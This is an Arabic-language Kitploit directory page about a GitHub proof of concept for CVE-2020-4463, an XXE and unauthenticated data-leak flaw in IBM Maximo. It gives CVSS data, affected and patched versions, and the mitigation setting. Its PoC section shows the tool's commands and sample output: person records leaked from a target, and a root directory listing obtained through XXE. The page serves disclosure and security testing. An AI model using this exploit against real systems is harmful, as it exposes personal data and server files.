Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-4463 — IBM Maximo Asset Management عرضة للإفصاح عن المعلومات عبر ثغرة XXE (CVE-2020-4463) | Kitploit
أدوات/GitHubGitHub/ibonok/cve-2020-4463
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubibonok/cve-2020-4463

CVE-2020-4463

IBM Maximo Asset Management عرضة للإفصاح عن المعلومات عبر ثغرة XXE (CVE-2020-4463)

عرض المستودع
5217منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

IBM Maximo Asset Management معرضة لثغرة الكشف عن المعلومات عبر ثغرة XXE (CVE-2020-4463)

IBM Maximo Asset Management معرضة لهجوم حقن الكيان الخارجي XML (XXE) عند معالجة بيانات XML. يمكن لمهاجم عن بعد استغلال هذه الثغرة لكشف معلومات حساسة أو استهلاك موارد الذاكرة.

النتيجة الأساسية: 8.2

المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L

المكونات الأساسية المتأثرة

IBM Maximo Asset Management 7.6.0
IBM Maximo Asset Management 7.6.1
IBM Maximo Asset Management جميع الإصدارات قبل 7.6.0

المنتجات المتأثرة

Maximo for Aviation
Maximo for Life Sciences
Maximo for Nuclear Power
Maximo for Oil and Gas
Maximo for Transportation
Maximo for Utilities
SmartCloud Control Desk
IBM Control Desk
Tivoli Integration Composer

الإصدار المصحح

الإصدار المصحح: Maximo Asset Management 7.6.1.2
الإصدارات السابقة: راجع الحل البديل (الرابط أدناه)

الروابط:

  • https://nvd.nist.gov/vuln/detail/CVE-2020-4463
  • https://www.ibm.com/support/pages/node/6253953

إثبات المفهوم (PoC)

إليكم الآن إثبات المفهوم للثغرة. ليس فقط الإصدارات المذكورة من قبل IBM معرضة للخطر. جميع الإصدارات قبل الإصدار 7.6.0 يمكن أن تكون معرضة أيضًا.

يقوم إثبات المفهوم بفحص ثغرتين قد تكونان موجودتين في النظام. ثغرة تسرب بيانات يمكن استغلالها إذا لم يتم تنفيذ المصادقة، وثغرة XXE التي يمكن استغلالها إذا لم يتم تعيين قيمة معينة (mxe.int.resolvexmlextentity=0) في التهيئة.

مثال

الاستخدام

root@kitploit:~
python3 CVE-2020-4463.py --help
usage: CVE-2020-4463.py [-h] [-x [XXE]] [-d [DATALEAK]] [--url [URL]]

CVE-2020-4463 PoC Data Leakage and XXE

optional arguments:
  -h, --help            show this help message and exit
  -x [XXE], --xxe [XXE]
                        XXE (Linux/Windows)
  -d [DATALEAK], --dataleak [DATALEAK]
                        Data Leakage REST request MXPERSON. May take a long
                        time.
  --url [URL]           Target URL http://, https://

إذا حصلت على الرد التالي، فإن الثغرتين غير موجودتين.

root@kitploit:~
Error 500: BMXAA1268E - No user credentials.

تسرب البيانات

قد يستغرق وقتًا طويلاً إذا كانت قاعدة البيانات تحتوي على العديد من الإدخالات.

root@kitploit:~
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -d

<?xml version="1.0" encoding="UTF-8"?>
<QueryMXPERSONResponse xmlns="http://www.ibm.com/maximo" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    creationDateTime="2020-11-16T10:42:49+01:0 0" transLanguage="EN" baseLanguage="EN"
    messageID="6927296.160551977018422092" maximoVersion="7 6 20170418-0100 V7608-61" rsStart="0" rsTotal="4374"
    rsCount="4374">
    <MXPERSONSet>
        <PERSON>
            <ADDRESSLINE1></ADDRESSLINE1>
            <CITY></CITY>
            <CLASSSTRUCTUREID></CLASSSTRUCTUREID>
            <COUNTRY></COUNTRY>
            <C_DESCRIZIONE></C_DESCRIZIONE>
            <C_MATRICOLA></C_MATRICOLA>
            <C_QUALIFICA></C_QUALIFICA>
            <FIRSTNAME>Lxxxxxxx</FIRSTNAME>
            <LANGUAGE>IT</LANGUAGE>
            <LASTNAME>xxxxxx</LASTNAME>
            <PERSONID>Lxxxxxxx</PERSONID>
            <POSTALCODE></POSTALCODE>
            <PRIMARYEMAIL>[email protected]</PRIMARYEMAIL>
            <PRIMARYPHONE></PRIMARYPHONE>
            <STATEPROVINCE></STATEPROVINCE>
            <STATUS maxvalue="ACTIVE">ACTIVE</STATUS>
            <TITLE></TITLE>
            <USERNOTFTYPE></USERNOTFTYPE>
            <EMAIL>
                <EMAILADDRESS>[email protected]</EMAILADDRESS>
            </EMAIL>
        </PERSON>

XXE

root@kitploit:~
CVE-2020-4463 git:(master) ✗ python3 CVE-2020-4463.py --url https://10.0.0.1 -x          

Error 500: BMXAA4160E - A major exception has occurred. Check the system log to see if there are any companion errors logged. Report this error to your system administrator.
	/c: &#40;No such file or directory&#41;
Error 500: For input string: &quot;bin
boot
dev
etc
home
initrd.img
initrd.img.old
lib
lib64
lost&#43;found
media
mnt
opt
proc
root
run
sbin
snap
srv
sys
tmp
usr
var
vmlinuz
vmlinuz.old
&quot;
تنزيل الأداة